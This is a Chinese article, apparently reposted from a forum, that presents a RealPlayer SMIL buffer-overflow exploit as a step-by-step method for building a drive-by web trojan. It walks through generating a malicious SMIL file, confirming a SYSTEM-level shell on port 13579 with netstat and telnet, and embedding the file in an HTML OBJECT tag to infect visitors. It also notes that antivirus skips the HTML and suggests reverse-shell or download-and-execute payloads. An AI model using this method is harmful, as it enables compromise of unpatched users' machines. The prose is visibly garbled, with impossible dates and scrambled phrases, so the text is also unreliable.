RealPlayer木马分析

  • 时间:
  • 浏览:0





作者: 论坛采集 zdnet网络安全

CNETNews.com.cn

308-01-19 13:29:20

关键词: 病毒防范 木马 RealPlayer

非安全第6期陈莎莎写了篇文章<<通过p2p共享影视文件抓肉鸡>>,后边的抓肉鸡主要思路是在rm影音文件中插入网页木马的url链接,用户看影音文件到某个九时弹出网页木马的url。着实,利用REALPLAYER某种 的漏洞,直接做成网页木马,让用户在看rm的时候直接中马是有更好的效果。有时候倘若一来,此漏洞利用是与IE无关了,有时候打REALPLAYER补丁的人少之又少,成功率还是很高的。倘若装有REALPLAYER或暴风影音支持smil格式等播放器的用户回会中招。

305年3月份,REALPLAYER暴出安全漏洞,大体意思是:RealPlayer事一款媒体播放器。使用者都还可以以基于缓冲区溢出脆弱用协调的多媒体综合语言(smil)文件形式语法分析守护线程,这能允许有2个 存心不良的攻击者在一台脆弱的机器上运行任意的代码。受影响系统: Windows RealPlayer 10.5 (6.0.12.1040-1056)、Windows RealPlayer 10 、Windows RealOne Player v2 (6.0.11.853 - 872) 、 Windows RealOne Player v2 (6.0.11.818 - 840) 、Windows RealOne Player v1 、Windows RealPlayer 8 、Windows RealPlayer Enterprise 、Mac RealPlayer 10 (10.0.0.305 - 325) 、Mac RealOne Player 、Linux RealPlayer 10 、Linux Helix Player。从你这种漏洞的描述上来看,也会明白你这种网页木马的可怕之处。

恶意的smil文件生成器,网上有现成的代码。如图1所示,我用编译好的real.exe生成了有2个 1.smil文件。

我本机装有暴风影音,打开你这种1.smil,如图2所示。此时我本机就会开13579端口。netstat -an来看一下,再telnet本机13579端口试试,成功!如图3、图4所示。注意在图4中执行命令的时候,并没人回显,打完命令运行后都都还可以看多结果的,是系统权限的。

你这种漏洞的利用法子大体倘若你这种样子。许多人歌词 歌词 现在倘若利用此漏洞来制做成网页木马,让用户打开网页后就会打开本机的13579端口。着实说白了,也倘若怎么都还可以在网页中调用生成的smil文件。哪些是smil文件呢?也倘若replayer连续播放影音文件的某种 调用法子。举个简单的例子,有时候想连续播放两首mp3,网页代码如下: 



<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">

<PARAM NAME="_ExtentX" VALUE="9313">

<PARAM NAME="_ExtentY" VALUE="1588">

<PARAM NAME="AUTOSTART" VALUE="-1">

<PARAM NAME="SHUFFLE" VALUE="0">

<PARAM NAME="PREFETCH" VALUE="0">

<PARAM NAME="NOLABELS" VALUE="0">

<PARAM NAME="SRC" VALUE="Real.smil">

<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">

<PARAM NAME="CONSOLE" VALUE="Clip">

<PARAM NAME="LOOP" VALUE="1">

<PARAM NAME="NUMLOOP">

<PARAM NAME="CENTER">

<PARAM NAME="MAINTAINASPECT" VALUE="0">

</OBJECT> 

============================请把以上内容保存成htm或html文件

Real.smil文件的内容:

<smil>

<head>

<layout>

<region id="oRegion" left="0" top="0" />

</layout>

</head>

<body>

<seq>

<video region="oReal" src="001.mp3" />

<video region="oReal" src="002.mp3" />

</seq>

</body>

</smil>

============================001.mp3和002.mp3(或其它媒体格式)与你保存的htm文件还有Real.smil上放同一目录下



根据我以上的代码做时候,你再用网页打开你做好的htm文件就都还可以在网页中调用有时候 影音播放器播放001.mp3和002.mp3了。那有了没人多的代码与理论基础了,我想要做网页木马了吗?做网页木马就简单多了,怕菜鸟还是不明白,再写一次代码吧:



===========REALPLAYER 网页木马代码现在开始英文==============================

<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">

<PARAM NAME="_ExtentX" VALUE="9313">

<PARAM NAME="_ExtentY" VALUE="1588">

<PARAM NAME="AUTOSTART" VALUE="-1">

<PARAM NAME="SHUFFLE" VALUE="0">

<PARAM NAME="PREFETCH" VALUE="0">

<PARAM NAME="NOLABELS" VALUE="0">

<PARAM NAME="SRC" VALUE="你用real.exe生成的恶意smil文件的名字,如1.smil">

<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">

<PARAM NAME="CONSOLE" VALUE="Clip">

<PARAM NAME="LOOP" VALUE="1">

<PARAM NAME="NUMLOOP">

<PARAM NAME="CENTER">

<PARAM NAME="MAINTAINASPECT" VALUE="0">

</OBJECT> 

===========REALPLAYER 网页木马代码现在开始英文==============================



法子倘若倘若简单,有2个 htm文件加有2个 恶意的smil文件就完整篇 现在开始英文。有时候你想把网页木马改成反弹端口或下载执行exe的,那就要看你构造恶意的smil文件的shellcode水平了。我这里倘若提供了有2个 思路,至于怎么都还可以完美打造你这种REALPLAYER 网页木马,许多人歌词 歌词 所许多人研究吧。你也要都还可以用我的思路,利用非安全6期陈莎莎的那篇文章制作的恶意rm文件改成网页调用的法子,估计也会这功。有时候,这就有正常的htm代码,杀毒软件不要再去杀这段htm代码的。另外,附个小知识,REALPLAYER的网页参数:



有时候 REAL文件参数:

AUTOSTART 自动播放:true|false 默认:false 

CENTER 上放后边位置 true|false 默认:false 

CONSOLE 连接多种格式 name, _master, or _unique 默认:无 

CONTROLS 播放面板的按钮和MTV、电影窗口 按钮的名字(PlayButton,PlayOnlyButton,StopButton,FFCtrl, RWCtrl,MuteCtrl,VolumeSlider,ImageWindow ) 默认:完整篇 按钮 

HEIGHT 强度,单位是百分比有时候象素,默认:0

WIDTH 强度,单位是百分比有时候象素,默认:0

LOOP 自动重放 true|false 默认:false 

MAINTAINASPECT 预留图象窗口. true|false 默认:false 

NOJAVA 处里JVM出先来. no true|false 默认:false 

NOLABELS 不显示播放器的有时候 信息true|false 默认:false 

NOLOGO 不显示Real的LOGO true|false 默认:false //Real很霸道这句我从来没人改成过,你怎么能么会改还是认为是 true

NUMLOOP 指定某段片段的反复播放 any number 默认:无 

REGION 绑定SMIL区域. SMIL region 默认:无 

SHUFFLE 随机播放某段 true|false 默认:false

SRC 文件连接地址 

BACKGROUNDCOLOR 背景颜色:颜色的英文名有时候RGB数值 默认:黑色